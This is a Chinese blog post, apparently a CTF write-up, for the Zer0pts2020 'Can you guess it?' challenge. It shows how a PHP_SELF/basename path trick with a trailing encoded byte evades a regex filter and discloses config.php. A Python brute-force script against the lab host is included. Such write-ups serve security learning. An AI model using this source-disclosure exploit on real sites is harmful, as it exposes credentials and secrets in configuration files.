一天一道ctf 第48天(basename)

最新推荐文章于 2022-08-26 23:34:31 发布

scrawman

最新推荐文章于 2022-08-26 23:34:31 发布

阅读量248

点赞数

本文链接：https://blog.csdn.net/scrawman/article/details/119243396

版权

[Zer0pts2020]Can you guess it?

<?php
include 'config.php'; // FLAG is defined in config.php

if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
  exit("I don't know what you are thinking, but I won't let you read it :)");
}

if (isset($_GET['source'])) {
  highlight_file(basename($_SERVER['PHP_SELF']));
  exit();
}

$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
  $guess = (string) $_POST['guess'];
  if (hash_equals($secret, $guess)) {
    $message = 'Congratulations! The flag is: ' . FLAG;
  } else {
    $message = 'Wrong.';
  }
}
?>

生成一个随机数，然后hash_equals，这个基本没法绕，破题点在上半部分。basename() 函数返回路径中的文件名部分，$_SERVER[‘PHP_SELF’]返回当前执行脚本的文件名。
…buuoj.cn/index.php/config.php $_SERVER[‘PHP_SELF’]会返回index.php/config.php，而basename()会返回config.php。这样我们再加上?source就可以让highlight_file显示config.php，而flag就在里面。

preg_match(’/config.php/*$/i’)过滤结尾是config.php/的文件名，因此我们要在config.php/后加上某个字符串同时让basename()之后的文件名还是config.php/，写一个脚本来完成这个工作。
在这里插入图片描述
这里我写了脚本输出来都是乱码，可能是php版本的问题或者字符设置的问题，这样的话就直接写一个请求URL的脚本，跟题目环境交互。

import requests

for i in range(0,255):

    j=hex(i)[2:]
    print(j)
    url = 'http://53875e09-912d-483f-9188-511903e0c9d4.node4.buuoj.cn/index.php/config.php/%'+ j + '?source'
    r = requests.get(url)
    if 'flag{' in r.text:
        print(r.text)
        break

在这里插入图片描述

scrawman

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
一天一道ctf 第48天(basename)

[Zer0pts2020]Can you guess it?<?phpinclude 'config.php'; // FLAG is defined in config.phpif (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) { exit("I don't know what you are thinking, but I won't let you read it :)");}if (isset($_GET['
复制链接

扫一扫